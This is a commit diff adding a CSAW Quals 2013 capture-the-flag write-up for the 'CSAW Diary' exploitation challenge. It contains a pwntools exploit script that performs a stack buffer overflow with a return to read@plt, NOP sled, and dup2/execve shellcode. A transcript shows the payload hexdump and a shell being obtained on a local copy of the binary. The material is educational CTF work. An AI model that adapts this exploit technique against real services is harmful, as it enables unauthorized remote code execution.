Added CSAW Diary 2013 writeup

2013/csaw-quals-2013/exploitation/csawdiary-300/README.md

@@ -0,0 +1,3 @@
+# Info
+
+This writeup is based on http://www.blue-lotus.net/csaw-ctf-quals-2013-exp300-writeup/

2013/csaw-quals-2013/exploitation/csawdiary-300/exploit.py

@@ -0,0 +1,40 @@
+from pwn import *
+context(os='linux', arch='i386', log_level='DEBUG')
+
+# If a HOST is given on the cmdline, then assume that it is already
+# running there
+if 'HOST' in args:
+    HOST = args['HOST']
+    PORT = int(args.get('PORT', 34266))
+    plt_read = 0x80486e0
+else:
+    # Otherwise start the binary locally
+    HOST = "127.0.0.1"
+    PORT = 34266
+    p = process('./fil_chal')
+    sleep(0.5)
+    binary = ELF("./fil_chal")
+    plt_read = binary.plt['read']  # read@plt: call 80486e0
+
+SHELLCODE = asm(shellcraft.dupsh(4))
+
+with remote(HOST, PORT) as r:
+    r.sendlineafter('UserName: ', 'csaw2013')
+    r.sendlineafter('Password: ', 'S1mplePWD')
+    r.sendlineafter('Entry Info: ', '65535')
+
+    buf = "A" * 0x420  # 1056
+    buf += p32(plt_read)
+    buf += p32(0x8049110)  # pop pop pop ret
+    buf += p32(4)  # fd
+    buf += p32(0x804b000)  # static
+    buf += p32(2)
+    buf += p32(0x804b000)  # static
+    buf += asm(shellcraft.i386.nop()) * 100
+    buf += SHELLCODE
+
+    log.info("Sending payload:\n%s" % hexdump(buf))
+    r.send(buf)
+    r.send(asm('jmp esp'))  # Jump to Shellcode
+    sleep(0.1)
+    r.interactive()

2013/csaw-quals-2013/exploitation/csawdiary-300/transcript.txt

@@ -0,0 +1,135 @@
+user@ubuntuvm:~/Desktop/csaw_diary$ python exploit.py
+[+] Starting program './fil_chal': Done
+[*] Security settings for 'fil_chal':
+    RELRO:         Full RELRO
+    Stack Canary:  No canary found
+    NX:            NX disabled
+    PIE:           No PIE
+    RPATH:         No RPATH
+    RUNPATH:       No RUNPATH
+[DEBUG] cpp -C -nostdinc -undef -P -I/home/user/Desktop/binjitsu/pwnlib/data/includes /dev/stdin
+[DEBUG] Assembling
+    .org 0x0
+    .section .shellcode,"ax"
+    .intel_syntax noprefix
+    dup_1:
+        push 0x4
+        pop ebx
+        push 0x3
+        pop ecx
+    loop_2:
+        dec ecx
+        /* call dup2('ebx', 'ecx') */
+        /* moving ebx into ebx, but this is a no-op */
+        /* moving ecx into ecx, but this is a no-op */
+        push 0x3f
+        pop eax
+        int 0x80
+        jnz loop_2
+        /* push '/bin///sh\x00' */
+        push 0x68
+        push 0x732f2f2f
+        push 0x6e69622f
+        /* call execve('esp', 0, 0) */
+        mov ebx, esp
+        xor ecx, ecx
+        push 0xb
+        pop eax
+        cdq /* Set edx to 0, eax is known to be positive */
+        int 0x80
+[DEBUG] /usr/bin/i386-linux-gnu-as -32 -o /tmp/pwn-asm-H5qiOE/step2 /tmp/pwn-asm-H5qiOE/step1
+[DEBUG] /usr/bin/i386-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-H5qiOE/step2 /tmp/pwn-asm-H5qiOE/step3
+[+] Opening connection to 127.0.0.1 on port 34266: Done
+[DEBUG] Received 0x2b5 bytes:
+    '     *************    $$$$$$$$$        AAAAAAA  *****                   *****\n'
+    '    *   *******  *    $ $$   $$        A     A   *   *                 *   * \n'
+    '    *  *       ***     $ $   $$       A  A A  A   *   *               *   *  \n'
+    '    *  *                $ $          A  A___A  A   *   *             *   *   \n'
+    '    *  *                 $ $        A           A   *   *    ****   *   *\n'
+    '    *  *                  $ $      A     AAA     A   *   *   *  *  *   *\n'
+    '    *  *       ***         $ $     A    A   A    A    *   ***   ***   *\n'
+    '    *  ********  *   $$$$$$   $    A    A   A    A     *             * \n'
+    '     *************   $$$$$$$$$$    AAAAAA   AAAAAA      ************* \n'
+    '\t\tDairy\n'
+    '\n'
+    'UserName: '
+[DEBUG] Sent 0x9 bytes:
+    'csaw2013\n'
+[DEBUG] Received 0xa bytes:
+    'Password: '
+[DEBUG] Sent 0xa bytes:
+    'S1mplePWD\n'
+[DEBUG] Received 0x26 bytes:
+    'Welcome!\n'
+    'http://youtu.be/KmtzQCSh6xk\n'
+    '\n'
+[DEBUG] Received 0xc bytes:
+    'Entry Info: '
+[DEBUG] Sent 0x6 bytes:
+    '65535\n'
+[DEBUG] cpp -C -nostdinc -undef -P -I/home/user/Desktop/binjitsu/pwnlib/data/includes /dev/stdin
+[DEBUG] Assembling
+    .org 0x0
+    .section .shellcode,"ax"
+    .intel_syntax noprefix
+        nop
+[DEBUG] /usr/bin/i386-linux-gnu-as -32 -o /tmp/pwn-asm-pBUQZ0/step2 /tmp/pwn-asm-pBUQZ0/step1
+[DEBUG] /usr/bin/i386-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-pBUQZ0/step2 /tmp/pwn-asm-pBUQZ0/step3
+[*] Sending payload:
+    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
+    *
+    00000420  e0 86 04 08  10 91 04 08  04 00 00 00  00 b0 04 08  │····│····│····│····│
+    00000430  02 00 00 00  00 b0 04 08  90 90 90 90  90 90 90 90  │····│····│····│····│
+    00000440  90 90 90 90  90 90 90 90  90 90 90 90  90 90 90 90  │····│····│····│····│
+    *
+    00000490  90 90 90 90  90 90 90 90  90 90 90 90  6a 04 5b 6a  │····│····│····│j·[j│
+    000004a0  03 59 49 6a  3f 58 cd 80  75 f8 6a 68  68 2f 2f 2f  │·YIj│?X··│u·jh│h///│
+    000004b0  73 68 2f 62  69 6e 89 e3  31 c9 6a 0b  58 99 cd 80  │sh/b│in··│1·j·│X···│
+    000004c0
+[DEBUG] Sent 0x4c0 bytes:
+    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
+    *
+    00000420  e0 86 04 08  10 91 04 08  04 00 00 00  00 b0 04 08  │····│····│····│····│
+    00000430  02 00 00 00  00 b0 04 08  90 90 90 90  90 90 90 90  │····│····│····│····│
+    00000440  90 90 90 90  90 90 90 90  90 90 90 90  90 90 90 90  │····│····│····│····│
+    *
+    00000490  90 90 90 90  90 90 90 90  90 90 90 90  6a 04 5b 6a  │····│····│····│j·[j│
+    000004a0  03 59 49 6a  3f 58 cd 80  75 f8 6a 68  68 2f 2f 2f  │·YIj│?X··│u·jh│h///│
+    000004b0  73 68 2f 62  69 6e 89 e3  31 c9 6a 0b  58 99 cd 80  │sh/b│in··│1·j·│X···│
+    000004c0
+[DEBUG] cpp -C -nostdinc -undef -P -I/home/user/Desktop/binjitsu/pwnlib/data/includes /dev/stdin
+[DEBUG] Assembling
+    .org 0x0
+    .section .shellcode,"ax"
+    .intel_syntax noprefix
+    jmp esp
+[DEBUG] /usr/bin/i386-linux-gnu-as -32 -o /tmp/pwn-asm-5LAGnQ/step2 /tmp/pwn-asm-5LAGnQ/step1
+[DEBUG] /usr/bin/i386-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-5LAGnQ/step2 /tmp/pwn-asm-5LAGnQ/step3
+[DEBUG] Sent 0x2 bytes:
+    00000000  ff e4                                               │··│
+    00000002
+[*] Switching to interactive mode
+$ ls -l
+[DEBUG] Sent 0x6 bytes:
+    'ls -l\n'
+[DEBUG] Received 0x6f bytes:
+    'total 16\n'
+    '-rw-rw-r-- 1 user user 1125 Mar 14 16:35 exploit.py\n'
+    '-rwxr-x--x 1 user user 9552 Mar 14 04:36 fil_chal\n'
+total 16
+-rw-rw-r-- 1 user user 1125 Mar 14 16:35 exploit.py
+-rwxr-x--x 1 user user 9552 Mar 14 04:36 fil_chal
+$ whoami
+[DEBUG] Sent 0x7 bytes:
+    'whoami\n'
+[DEBUG] Received 0x5 bytes:
+    'user\n'
+user
+$ exit
+[DEBUG] Sent 0x5 bytes:
+    'exit\n'
+[*] Got EOF while reading in interactive
+$
+[*] Interrupted
+[*] Closed connection to 127.0.0.1 port 34266
+[*] Program './fil_chal' stopped with exit code 255